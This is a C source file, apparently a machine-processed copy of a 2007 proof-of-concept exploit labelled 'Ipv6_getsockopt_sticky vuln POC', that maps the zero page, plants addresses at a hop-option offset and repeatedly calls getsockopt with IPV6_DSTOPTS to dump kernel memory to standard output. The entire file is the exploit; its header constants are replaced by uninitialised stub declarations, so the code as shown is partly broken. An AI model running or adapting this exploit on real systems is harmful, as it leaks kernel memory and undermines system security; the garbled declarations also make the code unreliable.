
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int AF_INET6 ;
 int ENDADDR ;
 int HOPOPT_OFFSET ;
 int INIADDR ;
 int IPPROTO_IPV6 ;
 int IPPROTO_TCP ;
 int IPV6_2292PKTOPTIONS ;
 int IPV6_DSTOPTS ;
 int MAP_ANONYMOUS ;
 int MAP_FIXED ;
 int MAP_PRIVATE ;
 int PROT_READ ;
 int PROT_WRITE ;
 int SOCK_STREAM ;
 int exit (int) ;
 int fprintf (int ,char*,int,int) ;
 int getsockopt (int,int ,int ,void*,unsigned int*) ;
 int i ;
 int memset (void*,int ,int) ;
 void* mmap (int *,int,int,int,int ,int ) ;
 int perror (char*) ;
 int setsockopt (int,int ,int ,void*,int ) ;
 int socket (int ,int ,int ) ;
 int sprintf (char*,char*,int) ;
 int stderr ;
 unsigned int strlen (char*) ;
 int write (int,char*,unsigned int) ;

int main(int argc, char *argv[]) {
  int s;
  unsigned int optlen;
  void *ptr;
  char value[10240];
  char text[12];

  fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n"
                 "dreyer '07 - free feels better\n"
                 "Dumping %p - %p to stdout\n",INIADDR,ENDADDR);

  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);


  setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)((void*)0), 0);


  ptr = mmap(((void*)0), 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);

  if (ptr != ((void*)0)) {
      perror("mmap");
      exit(-1);
  }

  memset(ptr,0,4096);



  ptr=(char *)((char *)ptr+HOPOPT_OFFSET);

  i=INIADDR;
  while(i<ENDADDR) {

      *((int *)ptr)=i;
      optlen=10240;

      getsockopt(s, IPPROTO_IPV6, IPV6_DSTOPTS, (void *)value, &optlen);
      if(optlen>0) {
          sprintf(text,"\n%08x:",i);
          write(1,text,strlen(text));
          write(1,value,optlen);
          i=i+optlen;
      } else {

          i=i+4;
      }
  }

  return 0;
}
